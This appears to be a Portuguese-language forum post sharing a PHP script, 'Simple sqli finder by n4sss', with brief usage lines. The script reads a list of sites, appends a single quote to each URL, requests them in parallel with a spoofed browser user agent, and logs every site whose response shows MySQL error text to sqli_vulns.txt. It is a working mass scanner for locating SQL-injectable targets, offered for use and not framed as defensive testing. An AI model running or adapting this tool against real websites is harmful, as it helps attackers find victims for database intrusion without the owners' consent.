Tool para automatizar a busca de sites com bugs de sql.
Use:
Code:
Use:
Código:
~$ php sqli.php sites.txt
Código:
Threads -> sqli($host, 10, $l); (Default: 10)
Código PHP:
<?php
/*
* Simple sqli finder by n4sss.
* Just set a file with sites to test sqli in argv[1]
*
* http://www.youtube.com/watch?v=NzCL9uLkQSI
* King! (8)
* Just listen.
*
* n-l4b[no_spam]hotmail[dot]com
*
* */
set_time_limit(NULL);
error_reporting(NULL);
function check($file){
$number = count(array_filter(explode("\n", file_get_contents($file))));
return $number;
}
function sqli($host, $threads, $l){
$multi = curl_multi_init();
$bol = array_chunk($host, $threads);
$cntz = 1;
foreach($bol as $site){
for($i=0;$i<=count($site)-1;$i++){
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $site[$i].'\'');
curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0");
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 8);
curl_multi_add_handle($multi, $ch[$i]);
}do{
curl_multi_exec($multi, $handle);usleep(1);}while($handle>0);
foreach($ch as $ch_id => $cnt)
{
$grep[$ch_id] = curl_multi_getcontent($cnt);
curl_multi_remove_handle($multi,$cnt);
print "[$cntz] Fuzzing -> $site[$ch_id]\n";
if(preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id]))
{
$fp = fopen($l, "a");
fwrite($fp, $site[$ch_id]."\n");
fclose($fp);
flush();
}
$cntz++;
}
}
}
if(!$argv[1]){
print "+--------------------------------------------------+\n";
print "|Please use correctly: |\n";
print "|Specify the file with the sites in argv[1] :) |\n";
print "+--------------------------------------------------+\n";
}else{
print "\n############ Simple sqli finder by n4sss ############\n";
if(!is_file("$argv[1]")) die("[-] FILE $argv[1] not found\n EXITING\n");
$host = array_filter(explode("\n", file_get_contents("$argv[1]")));
$l = "sqli_vulns.txt";
sqli($host, 10, $l);
$number = check($l);
print "[] Fuzz ok n4sss!\n";
print "We have -> ".$number." sites with sql error (:\n";
}
?>
Comment